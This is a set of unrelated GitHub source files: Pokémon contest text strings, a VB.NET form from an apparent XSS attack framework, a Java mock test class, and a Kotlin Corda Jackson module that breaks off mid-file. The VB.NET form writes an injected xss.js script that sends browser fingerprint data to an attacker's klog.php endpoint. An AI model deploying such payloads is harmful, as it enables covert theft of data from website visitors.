gText_NotSameTypeAsOneBeforeGood:: @ 827E143 .string "It's not the same type as\n" .string "the one before--good!{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_StoodOutMuchMoreThanMonBefore:: @ 827E17F .string "It stood out much more\n" .string "than the POKéMON before.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_DidntDoAsWellAsMonBefore:: @ 827E1BB .string "It didn't do as well as the\n" .string "POKéMON before.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsConditionRoseAboveUsual:: @ 827E1F3 .string "{STR_VAR_1}'s condition\n" .string "rose above usual.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsHotStatusMadeGreatAppeal:: @ 827E220 .string "{STR_VAR_1}'s hot status\n" .string "made it a great appeal!{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MovedUpInLineForNextAppeal:: @ 827E254 .string "It moved up in line for\n" .string "the next appeal.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MovedBackInLineForNextAppeal:: @ 827E289 .string "It moved back in line once\n" .string "for the next appeal.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_ScrambledUpOrderForNextTurn:: @ 827E2C5 .string "It scrambled up the\n" .string "order for the next turn.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_JudgeLookedAtMonExpectantly:: @ 827E2FE .string "The JUDGE looked at\n" .string "{STR_VAR_1} expectantly.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_AppealComboWentOverWell:: @ 827E32E .string "The appeal combo went\n" .string "over well.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_AppealComboWentOverVeryWell:: @ 827E35B .string "The appeal combo went\n" .string "over very well.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_AppealComboWentOverExcellently:: @ 827E38D .string "The appeal combo went\n" .string "over excellently.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonManagedToAvertGaze:: @ 827E3C1 .string "{STR_VAR_1} managed to\n" .string "avert its gaze.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonManagedToAvoidSeeingIt:: @ 827E3EB .string "{STR_VAR_1} managed to\n" .string "avoid seeing it.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonIsntFazedByThatSortOfThing:: @ 827E416 .string "{STR_VAR_1} isn't fazed\n" .string "by that sort of thing.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonBecameALittleDistracted:: @ 827E448 .string "{STR_VAR_1} became a\n" .string "little distracted.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_TriedToStartleOtherPokemon:: @ 827E473 .string "It tried to startle the\n" .string "other POKéMON.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonLookedDownOutOfDistraction:: @ 827E4A6 .string "{STR_VAR_1} looked down\n" .string "out of distraction.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonTurnedBackOutOfDistraction:: @ 827E4D5 .string "{STR_VAR_1} turned back\n" .string "out of distraction.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonCouldntHelpUtteringCry:: @ 827E504 .string "{STR_VAR_1} couldn't help\n" .string "uttering a cry.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonCouldntHelpLeapingUp:: @ 827E531 .string "{STR_VAR_1} couldn't help\n" .string "leaping up.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonTrippedOutOfDistraction:: @ 827E55A .string "{STR_VAR_1} tripped over\n" .string "out of distraction.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonWasTooNervousToMove:: @ 827E58A .string "{STR_VAR_1} was too\n" .string "nervous to move.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_ButItMessedUp2:: @ 827E5B2 .string "But it messed up.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_ButItFailedToMakeTargetNervous:: @ 827E5D0 .string "But it failed to make\n" .string "the target nervous.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_ButItFailedToMakeAnyoneNervous:: @ 827E606 .string "But it failed to make\n" .string "anyone nervous.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_ButItWasIgnored:: @ 827E638 .string "But it was ignored…{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_CouldntImproveItsCondition:: @ 827E658 .string "But it couldn't improve\n" .string "its condition…{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_BadConditionResultedInWeakAppeal:: @ 827E68B .string "Its bad condition\n" .string "resulted in a weak appeal.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonWasUnaffected:: @ 827E6C4 .string "{STR_VAR_1} was\n" .string "unaffected.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_RepeatedAppeal:: @ 827E6E3 .string "{STR_VAR_1} disappointed\n" .string "by repeating an appeal.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonsXWentOverGreat:: @ 827E717 .string "{STR_VAR_1}'s {STR_VAR_3}\n" .string "went over great.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonsXDidntGoOverWell:: @ 827E73C .string "{STR_VAR_1}'s {STR_VAR_3}\n" .string "didn't go over well here…{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonsXGotTheCrowdGoing:: @ 827E76A .string "{STR_VAR_1}'s {STR_VAR_3}\n" .string "got the crowd going.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonCantAppealNextTurn:: @ 827E793 .string "{STR_VAR_1} can't appeal\n" .string "next turn…{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_AttractedCrowdsAttention:: @ 827E7BA .string "It attracted the crowd's\n" .string "attention.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_CrowdContinuesToWatchMon:: @ 827E7EA .string "The crowd continues to\n" .string "watch {STR_VAR_3}.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_MonsMoveIsIgnored:: @ 827E817 .string "{STR_VAR_1}'s\n" .string "{STR_VAR_2} is ignored.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_Contest_Shyness:: @ 827E837 .string "shyness$" gText_Contest_Anxiety:: @ 827E83F .string "anxiety$" gText_Contest_Laziness:: @ 827E847 .string "laziness$" gText_Contest_Hesitancy:: @ 827E850 .string "hesitancy$" gText_Contest_Fear:: @ 827E85A .string "fear$" gText_Contest_Coolness:: @ 827E85F .string "coolness$" gText_Contest_Beauty:: @ 827E868 .string "beauty$" gText_Contest_Cuteness:: @ 827E86F .string "cuteness$" gText_Contest_Smartness:: @ 827E878 .string "smartness$" gText_Contest_Toughness:: @ 827E882 .string "toughness$" @ Unused gText_Tension:: @ 827E88C .string "TENSION$" gText_CoolMove:: @ 827E894 .string "COOL Move$" gText_BeautyMove:: @ 827E89E .string "BEAUTY Move$" gText_CuteMove:: @ 827E8AA .string "CUTE Move$" gText_SmartMove:: @ 827E8B4 .string "SMART Move$" gText_ToughMove:: @ 827E8BF .string "TOUGH Move$" gText_3QuestionMarks:: @ 827E8CA .string "???$"
{ "pile_set_name": "Github" }
Imports System.IO Public Class xss_info_browser_detector Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click On Error Resume Next Dim ran = New Random() Dim tmp = ran.Next(300, 350) Dim stream As New IO.StreamWriter(Application.StartupPath & "\xss.js") stream.WriteLine("if (document.getElementById('xenotix_brfg" & Str(tmp) & "') == null){ ") stream.WriteLine(TextBox1.Text) stream.WriteLine("new Image().src = 'http://" & xss_server.server_ip & "/klog.php?log='+ret;") stream.WriteLine(" script = document.createElement('script');script.id = 'xenotix_brfg" & Str(tmp) & "'; document.body.appendChild(script); }") stream.Close() Button1.Enabled = False Timer1.Enabled = True End Sub Private Sub xss_info_browser_fingerprint_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load On Error Resume Next TextBox1.Visible = False IO.File.Delete("logs.txt") End Sub Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click On Error Resume Next IO.File.Delete("xss.js") IO.File.Delete("logs.txt") Me.Close() End Sub Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick On Error Resume Next Dim line As String = "" Dim readfile As System.IO.TextReader = New StreamReader(Application.StartupPath & "\logs.txt") line = readfile.ReadToEnd() If Not line = "" Then WebBrowser1.ScriptErrorsSuppressed = True WebBrowser1.DocumentText = line Timer1.Enabled = False End If readfile.Close() readfile = Nothing End Sub End Class
{ "pile_set_name": "Github" }
/* * Copyright (C) 2006 TopCoder Inc., All Rights Reserved. */ package com.topcoder.util.actionmanager; import javax.swing.undo.UndoableEdit; /** * <p> * This class implements the UndoableEdit interface and used for testing only. * </p> * * @author biotrail * @version 1.0 */ public class MockUndoableEdit implements UndoableEdit { /** * <p> * This method implements the undo() method defined in the UndoableEdit interface. * </p> * * <p> * Empty method. * </p> */ public void undo() { // empty } /** * <p> * This method implements the canUndo() method defined in the UndoableEdit interface. * </p> * * <p> * This method always returns false. * </p> * * @return false */ public boolean canUndo() { return false; } /** * <p> * This method implements the redo() method defined in the UndoableEdit interface. * </p> * * <p> * Empty method. * </p> */ public void redo() { } /** * <p> * This method implements the canRedo() method defined in the UndoableEdit interface. * </p> * * <p> * This method always returns false. * </p> * * @return false */ public boolean canRedo() { return false; } /** * <p> * This method implements the die() method defined in the UndoableEdit interface. * </p> * * <p> * Empty method. * </p> */ public void die() { // empty } /** * <p> * This method implements the addEdit() method defined in the UndoableEdit interface. * </p> * * <p> * This method always returns false. * </p> * * @param anEdit anEdit * @return false */ public boolean addEdit(UndoableEdit anEdit) { return false; } /** * <p> * This method implements the replaceEdit() method defined in the UndoableEdit interface. * </p> * * <p> * This method always returns false. * </p> * * @param anEdit anEdit * @return false */ public boolean replaceEdit(UndoableEdit anEdit) { return false; } /** * <p> * This method implements the isSignificant() method defined in the UndoableEdit interface. * </p> * * <p> * This method always returns false. * </p> * * @return false */ public boolean isSignificant() { return false; } /** * <p> * This method implements the getPresentationName() method defined in the UndoableEdit interface. * </p> * * @return the presentation name */ public String getPresentationName() { return "MockUndoableEdit"; } /** * <p> * This method implements the getUndoPresentationName() method defined in the UndoableEdit interface. * </p> * * @return the undo presentation name */ public String getUndoPresentationName() { return "Undo:MockUndoableEdit"; } /** * <p> * This method implements the getRedoPresentationName() method defined in the UndoableEdit interface. * </p> * * @return the redo presentation name */ public String getRedoPresentationName() { return "Redo:MockUndoableEdit"; } }
{ "pile_set_name": "Github" }
@file:Suppress("DEPRECATION") package net.corda.client.jackson.internal import com.fasterxml.jackson.annotation.* import com.fasterxml.jackson.annotation.JsonAutoDetect.Value import com.fasterxml.jackson.annotation.JsonAutoDetect.Visibility import com.fasterxml.jackson.annotation.JsonCreator.Mode.DISABLED import com.fasterxml.jackson.annotation.JsonInclude.Include import com.fasterxml.jackson.core.JsonGenerator import com.fasterxml.jackson.core.JsonParseException import com.fasterxml.jackson.core.JsonParser import com.fasterxml.jackson.core.JsonToken import com.fasterxml.jackson.databind.* import com.fasterxml.jackson.databind.annotation.JsonDeserialize import com.fasterxml.jackson.databind.annotation.JsonSerialize import com.fasterxml.jackson.databind.cfg.MapperConfig import com.fasterxml.jackson.databind.deser.BeanDeserializerModifier import com.fasterxml.jackson.databind.deser.ContextualDeserializer import com.fasterxml.jackson.databind.deser.std.DelegatingDeserializer import com.fasterxml.jackson.databind.deser.std.FromStringDeserializer import com.fasterxml.jackson.databind.introspect.AnnotatedClass import com.fasterxml.jackson.databind.introspect.BasicClassIntrospector import com.fasterxml.jackson.databind.introspect.POJOPropertiesCollector import com.fasterxml.jackson.databind.module.SimpleModule import com.fasterxml.jackson.databind.node.IntNode import com.fasterxml.jackson.databind.node.ObjectNode import com.fasterxml.jackson.databind.ser.BeanPropertyWriter import com.fasterxml.jackson.databind.ser.BeanSerializerModifier import com.fasterxml.jackson.databind.ser.std.StdScalarSerializer import com.fasterxml.jackson.databind.ser.std.UUIDSerializer import com.google.common.primitives.Booleans import net.corda.client.jackson.JacksonSupport import net.corda.core.contracts.* import net.corda.core.crypto.* import net.corda.core.crypto.PartialMerkleTree.PartialTree import net.corda.core.flows.StateMachineRunId import net.corda.core.identity.* import net.corda.core.internal.DigitalSignatureWithCert import net.corda.core.internal.createComponentGroups import net.corda.core.node.NodeInfo import net.corda.core.serialization.SerializeAsToken import net.corda.core.serialization.SerializedBytes import net.corda.core.serialization.deserialize import net.corda.core.serialization.serialize import net.corda.core.transactions.* import net.corda.core.utilities.ByteSequence import net.corda.core.utilities.NetworkHostAndPort import net.corda.core.utilities.parseAsHex import net.corda.core.utilities.toHexString import net.corda.serialization.internal.AllWhitelist import net.corda.serialization.internal.amqp.SerializerFactoryBuilder import net.corda.serialization.internal.amqp.hasCordaSerializable import net.corda.serialization.internal.amqp.registerCustomSerializers import java.math.BigDecimal import java.security.PublicKey import java.security.cert.CertPath import java.time.Instant import java.util.* class CordaModule : SimpleModule("corda-core") { override fun setupModule(context: SetupContext) { super.setupModule(context) // For classes which are annotated with CordaSerializable we want to use the same set of properties as the Corda serilasation scheme. // To do that we use CordaSerializableClassIntrospector to first turn on field visibility for these classes (the Jackson default is // private fields are not included) and then we use CordaSerializableBeanSerializerModifier to remove any extra properties that Jackson // might pick up. context.setClassIntrospector(CordaSerializableClassIntrospector(context)) context.addBeanSerializerModifier(CordaSerializableBeanSerializerModifier()) context.addBeanDeserializerModifier(AmountBeanDeserializerModifier()) context.setMixInAnnotations(PartyAndCertificate::class.java, PartyAndCertificateMixin::class.java) context.setMixInAnnotations(NetworkHostAndPort::class.java, NetworkHostAndPortMixin::class.java) context.setMixInAnnotations(CordaX500Name::class.java, CordaX500NameMixin::class.java) context.setMixInAnnotations(Amount::class.java, AmountMixin::class.java) context.setMixInAnnotations(AbstractParty::class.java, AbstractPartyMixin::class.java) context.setMixInAnnotations(AnonymousParty::class.java, AnonymousPartyMixin::class.java) context.setMixInAnnotations(Party::class.java, PartyMixin::class.java) context.setMixInAnnotations(PublicKey::class.java, PublicKeyMixin::class.java) context.setMixInAnnotations(ByteSequence::class.java, ByteSequenceMixin::class.java) context.setMixInAnnotations(SecureHash.SHA256::class.java, SecureHashSHA256Mixin::class.java) context.setMixInAnnotations(SecureHash::class.java, SecureHashSHA256Mixin::class.java) context.setMixInAnnotations(SerializedBytes::class.java, SerializedBytesMixin::class.java) context.setMixInAnnotations(DigitalSignature.WithKey::class.java, ByteSequenceWithPropertiesMixin::class.java) context.setMixInAnnotations(DigitalSignatureWithCert::class.java, ByteSequenceWithPropertiesMixin::class.java) context.setMixInAnnotations(TransactionSignature::class.java, ByteSequenceWithPropertiesMixin::class.java) context.setMixInAnnotations(SignedTransaction::class.java, SignedTransactionMixin::class.java) context.setMixInAnnotations(WireTransaction::class.java, WireTransactionMixin::class.java) context.setMixInAnnotations(TransactionState::class.java, TransactionStateMixin::class.java) context.setMixInAnnotations(Command::class.java, CommandMixin::class.java) context.setMixInAnnotations(TimeWindow::class.java, TimeWindowMixin::class.java) context.setMixInAnnotations(PrivacySalt::class.java, PrivacySaltMixin::class.java) context.setMixInAnnotations(SignatureScheme::class.java, SignatureSchemeMixin::class.java) context.setMixInAnnotations(SignatureMetadata::class.java, SignatureMetadataMixin::class.java) context.setMixInAnnotations(PartialTree::class.java, PartialTreeMixin::class.java) context.setMixInAnnotations(NodeInfo::class.java, NodeInfoMixin::class.java) context.setMixInAnnotations(StateMachineRunId::class.java, StateMachineRunIdMixin::class.java) } } private class CordaSerializableClassIntrospector(private val context: Module.SetupContext) : BasicClassIntrospector() { override fun constructPropertyCollector( config: MapperConfig<*>?, ac: AnnotatedClass?, type: JavaType, forSerialization: Boolean, mutatorPrefix: String? ): POJOPropertiesCollector { if (hasCordaSerializable(type.rawClass)) { // Adjust the field visibility of CordaSerializable classes on the fly as they are encountered. context.configOverride(type.rawClass).visibility = Value.defaultVisibility().withFieldVisibility(Visibility.ANY) } return super.constructPropertyCollector(config, ac, type, forSerialization, mutatorPrefix) } } private class CordaSerializableBeanSerializerModifier : BeanSerializerModifier() { // We need to pass in a SerializerFactory when scanning for properties, but don't actually do any serialisation so any will do. private val serializerFactory = SerializerFactoryBuilder.build(AllWhitelist, javaClass.classLoader).also { registerCustomSerializers(it) } override fun changeProperties(config: SerializationConfig, beanDesc: BeanDescription, beanProperties: MutableList<BeanPropertyWriter>): MutableList<BeanPropertyWriter> { val beanClass = beanDesc.beanClass if (hasCordaSerializable(beanClass) && !SerializeAsToken::class.java.isAssignableFrom(beanClass)) { val typeInformation = serializerFactory.getTypeInformation(beanClass) val propertyNames = typeInformation.propertiesOrEmptyMap.mapNotNull { if (it.value.isCalculated) null else it.key } beanProperties.removeIf { it.name !in propertyNames } } return beanProperties } } @ToStringSerialize @JsonDeserialize(using = NetworkHostAndPortDeserializer::class) private interface NetworkHostAndPortMixin private class NetworkHostAndPortDeserializer : SimpleDeserializer<NetworkHostAndPort>({ NetworkHostAndPort.parse(text) }) @JsonSerialize(using = PartyAndCertificateSerializer::class) // TODO Add deserialization which follows the same lookup logic as Party private interface PartyAndCertificateMixin private class PartyAndCertificateSerializer : JsonSerializer<PartyAndCertificate>() { override fun serialize(value: PartyAndCertificate, gen: JsonGenerator, serializers: SerializerProvider) { val mapper = gen.codec as JacksonSupport.PartyObjectMapper if (mapper.isFullParties) { gen.writeObject(PartyAndCertificateJson(value.name, value.certPath)) } else { gen.writeObject(value.party) } } } private class PartyAndCertificateJson(val name: CordaX500Name, val certPath: CertPath) @JsonSerialize(using = SignedTransactionSerializer::class) @JsonDeserialize(using = SignedTransactionDeserializer::class) private interface SignedTransactionMixin private class SignedTransactionSerializer : JsonSerializer<SignedTransaction>() { override fun serialize(value: SignedTransaction, gen: JsonGenerator, serializers: SerializerProvider) { val core = value.coreTransaction val stxJson = when (core) { is WireTransaction -> StxJson(wire = core, signatures = value.sigs) is FilteredTransaction -> StxJson(filtered = core, signatures = value.sigs) is NotaryChangeWireTransaction -> StxJson(notaryChangeWire = core, signatures = value.sigs) is ContractUpgradeWireTransaction -> StxJson(contractUpgradeWire = core, signatures = value.sigs) is ContractUpgradeFilteredTransaction -> StxJson(contractUpgradeFiltered = core, signatures = value.sigs) else -> throw IllegalArgumentException("Don't know about ${core.javaClass}") } gen.writeObject(stxJson) } } private class SignedTransactionDeserializer : JsonDeserializer<SignedTransaction>() { override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): SignedTransaction { val wrapper = parser.readValueAs<StxJson>() val core = wrapper.run { wire ?: filtered ?: notaryChangeWire ?: contractUpgradeWire ?: contractUpgradeFiltered!! } return SignedTransaction(core, wrapper.signatures) } } @JsonInclude(Include.NON_NULL) private data class StxJson( val wire: WireTransaction? = null, val filtered: FilteredTransaction? = null, val notaryChangeWire: NotaryChangeWireTransaction? = null, val contractUpgradeWire: ContractUpgradeWireTransaction? = null, val contractUpgradeFiltered: ContractUpgradeFilteredTransaction? = null, val signatures: List<TransactionSignature> ) { init { val count = Booleans.countTrue(wire != null, filtered != null, notaryChangeWire != null, contractUpgradeWire != null, contractUpgradeFiltered != null) require(count == 1) { this } } } @JsonSerialize(using = WireTransactionSerializer::class) @JsonDeserialize(using = WireTransactionDeserializer::class) private interface WireTransactionMixin private class WireTransactionSerializer : JsonSerializer<WireTransaction>() { override fun serialize(value: WireTransaction, gen: JsonGenerator, serializers: SerializerProvider) { gen.writeObject(WireTransactionJson( value.id, value.notary, value.inputs, value.outputs, value.commands, value.timeWindow, value.attachments, value.references, value.privacySalt, value.networkParametersHash )) } } private class WireTransactionDeserializer : JsonDeserializer<WireTransaction>() { override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): WireTransaction { val wrapper = parser.readValueAs<WireTransactionJson>() val componentGroups = createComponentGroups( wrapper.inputs, wrapper.outputs, wrapper.commands, wrapper.attachments, wrapper.notary, wrapper.timeWindow, wrapper.references, wrapper.networkParametersHash ) return WireTransaction(componentGroups, wrapper.privacySalt) } } private class WireTransactionJson(val id: SecureHash, val notary: Party?, val inputs: List<StateRef>, val outputs: List<TransactionState<*>>, val commands: List<Command<*>>, val timeWindow: TimeWindow?, val attachments: List<SecureHash>, val references: List<StateRef>, val privacySalt: PrivacySalt, val networkParametersHash: SecureHash?) private interface TransactionStateMixin { @get:JsonTypeInfo(use = JsonTypeInfo.Id.CLASS) val data: ContractState @get:JsonTypeInfo(use = JsonTypeInfo.Id.CLASS) val constraint: AttachmentConstraint } private interface CommandMixin { @get:JsonTypeInfo(use = JsonTypeInfo.Id.CLASS) val value: CommandData } @JsonDeserialize(using = TimeWindowDeserializer::class) private interface TimeWindowMixin private class TimeWindowDeserializer : JsonDeserializer<TimeWindow>() { override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): TimeWindow { return parser.readValueAs<TimeWindowJson>().run { when { fromTime != null && untilTime != null -> TimeWindow.between(fromTime, untilTime) fromTime != null -> TimeWindow.fromOnly(fromTime) untilTime != null -> TimeWindow.untilOnly(untilTime) else -> throw JsonParseException(parser, "Neither fromTime nor untilTime exists for TimeWindow") } } } } private data class TimeWindowJson(val fromTime: Instant?, val untilTime: Instant?) @JsonSerialize(using = PrivacySaltSerializer::class) @JsonDeserialize(using = PrivacySaltDeserializer::class) private interface PrivacySaltMixin private class PrivacySaltSerializer : JsonSerializer<PrivacySalt>() { override fun serialize(value: PrivacySalt, gen: JsonGenerator, serializers: SerializerProvider) { gen.writeString(value.bytes.toHexString()) } } private class PrivacySaltDeserializer : SimpleDeserializer<PrivacySalt>({ PrivacySalt(text.parseAsHex()) }) // TODO Add a lookup function by number ID in Crypto private val signatureSchemesByNumberID = Crypto.supportedSignatureSchemes().associateBy { it.schemeNumberID } @JsonSerialize(using = SignatureMetadataSerializer::class) @JsonDeserialize(using = SignatureMetadataDeserializer::class) private interface SignatureMetadataMixin private class SignatureMetadataSerializer : JsonSerializer<SignatureMetadata>() { override fun serialize(value: SignatureMetadata, gen: JsonGenerator, serializers: SerializerProvider) { gen.jsonObject { writeNumberField("platformVersion", value.platformVersion) writeObjectField("scheme", value.schemeNumberID.let { signatureSchemesByNumberID[it] ?: it }) } } } private class SignatureMetadataDeserializer : JsonDeserializer<SignatureMetadata>() { override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): SignatureMetadata { val json = parser.readValueAsTree<ObjectNode>() val scheme = json["scheme"] val schemeNumberID = if (scheme is IntNode) { scheme.intValue() } else { Crypto.findSignatureScheme(scheme.textValue()).schemeNumberID } return SignatureMetadata(json["platformVersion"].intValue(), schemeNumberID) } } @JsonSerialize(using = PartialTreeSerializer::class) @JsonDeserialize(using = PartialTreeDeserializer::class) private interface PartialTreeMixin private class PartialTreeSerializer : JsonSerializer<PartialTree>() { override fun serialize(value: PartialTree, gen: JsonGenerator, serializers: SerializerProvider) { gen.writeObject(convert(value)) } private fun convert(tree: PartialTree): PartialTreeJson { return when (tree) { is PartialTree.IncludedLeaf -> PartialTreeJson(includedLeaf = tree.hash) is PartialTree.Leaf -> PartialTreeJson(leaf = tree.hash) is PartialTree.Node -> PartialTreeJson(left = convert(tree.left), right = convert(tree.right)) else -> throw IllegalArgumentException("Don't know how to serialize $tree") } } } private class PartialTreeDeserializer : JsonDeserializer<PartialTree>() { override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): PartialTree { return convert(parser.readValueAs(PartialTreeJson::class.java)) } private fun convert(wrapper: PartialTreeJson): PartialTree { return wrapper.run { when { includedLeaf != null -> PartialTree.IncludedLeaf(includedLeaf) leaf != null -> PartialTree.Leaf(leaf) else -> PartialTree.Node(convert(left!!), convert(right!!)) } } } } @JsonInclude(Include.NON_NULL) private class PartialTreeJson(val includedLeaf: SecureHash? = null, val leaf: SecureHash? = null, val left: PartialTreeJson? = null, val right: PartialTreeJson? = null) { init { if (includedLeaf != null) { require(leaf == null && left == null && right == null) { "Invalid JSON structure" } } else if (leaf != null) { require(left == null && right == null) { "Invalid JSON structure" } } else { require(left != null && right != null) { "Invalid JSON structure" } } } } @JsonSerialize(using = SignatureSchemeSerializer::class) @JsonDeserialize(using = SignatureSchemeDeserializer::class) private interface SignatureSchemeMixin private class SignatureSchemeSerializer : JsonSerializer<SignatureScheme>() { override fun serialize(value: SignatureScheme, gen: JsonGenerator, serializers: SerializerProvider) { gen.writeString(value.schemeCodeName) } } private class SignatureSchemeDeserializer : JsonDeserializer<SignatureScheme>() { override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): SignatureScheme { return if (parser.currentToken == JsonToken.VALUE_NUMBER_INT) { signatureSchemesByNumberID[parser.intValue] ?: throw JsonParseException(parser, "Unable to find SignatureScheme ${parser.text}") } else { Crypto.findSignatureScheme(parser.text) } } } @JsonSerialize(using = SerializedBytesSerializer::class) @JsonDeserialize(using = SerializedBytesDeserializer::class) private class SerializedBytesMixin private class SerializedBytesSerializer : JsonSerializer<SerializedBytes<*>>() { override fun serialize(value: SerializedBytes<*>, gen: JsonGenerator, serializers: SerializerProvider) { val deserialized = value.deserialize<Any>() gen.jsonObject { writeStringField("class", deserialized.javaClass.name) writeObjectField("deserialized", deserialized) } } } private class SerializedBytesDeserializer : JsonDeserializer<SerializedBytes<*>>() { override fun deserialize(parser: JsonParser, context: DeserializationContext): SerializedBytes<Any> { return if (parser.currentToken == JsonToken.START_OBJECT) { val mapper = parser.codec as ObjectMapper val json = parser.readValueAsTree<ObjectNode>() val clazz = context.findClass(json["class"].textValue()) val pojo = mapper.convertValue(json["deserialized"], clazz) pojo.serialize() } else { SerializedBytes(parser.binaryValue) } } } @JsonDeserialize(using = JacksonSupport.PartyDeserializer::class) private interface AbstractPartyMixin @JsonSerialize(using = JacksonSupport.AnonymousPartySerializer::class) @JsonDeserialize(using = JacksonSupport.AnonymousPartyDeserializer::class) private interface AnonymousPartyMixin @JsonSerialize(using = JacksonSupport.PartySerializer::class) private interface PartyMixin @ToStringSerialize @JsonDeserialize(using = JacksonSupport.CordaX500NameDeserializer::class) private interface CordaX500NameMixin @JsonDeserialize(using = JacksonSupport.NodeInfoDeserializer::class) private interface NodeInfoMixin @ToStringSerialize @JsonDeserialize(using = JacksonSupport.SecureHashDeserializer::class) private interface SecureHashSHA256Mixin @JsonSerialize(using = JacksonSupport.PublicKeySerializer::class) @JsonDeserialize(using = JacksonSupport.PublicKeyDeserializer::class) private interface PublicKeyMixin @JsonSerialize(using = StateMachineRunIdSerializer::class) @JsonDeserialize(using = StateMachineRunIdDeserializer::class) private interface StateMachineRunIdMixin private class StateMachineRunIdSerializer : StdScalarSerializer<StateMachineRunId>(StateMachineRunId::class.java) { private val uuidSerializer = UUIDSerializer() override fun isEmpty(provider: SerializerProvider?, value: StateMachineRunId): Boolean { return uuidSerializer.isEmpty(provider, value.uuid) } override fun serialize(value: StateMachineRunId, gen: JsonGenerator?, provider: SerializerProvider?) { uuidSerializer.serialize(value.uuid, gen, provider) } } private class StateMachineRunIdDeserializer : FromStringDeserializer<StateMachineRunId>(StateMachineRunId::class.java) { override fun _deserialize(value: String, ctxt: DeserializationContext?): StateMachineRunId { return StateMachineRunId(UUID.fromString(value)) } } @Suppress("unused_parameter") @ToStringSerialize private abstract class AmountMixin @JsonCreator(mode = DISABLED) constructor( quantity: Long, displayTokenSize: BigDecimal, token: Any ) { /** * This mirrors the [Amount] constructor that we want Jackson to use, and * requires that we also tell Jackson NOT to use [Amount]'s primary constructor. */ @JsonCreator constructor( @JsonProperty("quantity") quantity: Long, @JsonDeserialize(using = TokenDeserializer::class) @JsonProperty("token") token: Any ) : this(quantity, Amount.getDisplayTokenSize(token), token) } /** * Implements polymorphic deserialization for [Amount.token]. Kotlin must * be able to determine the concrete [Amount] type at runtime, or it will * fall back to using [Currency]. */ private class TokenDeserializer(private val tokenType: Class<*>) : JsonDeserializer<Any>(), ContextualDeserializer { @Suppress("unused") constructor() : this(Currency::class.java) override fun deserialize(parser: JsonParser, ctxt: DeserializationContext): Any = parser.readValueAs(tokenType) override fun createContextual(ctxt: DeserializationContext, property: BeanProperty?): TokenDeserializer { if (property == null) return this return TokenDeserializer(property.type.rawClass.let { type -> if (type == Any::class.java) Currency::class.java else type }) } } /** * Intercepts bean-based deserialization for the generic [Amount] type. */ private class AmountBeanDeserializerModifier : 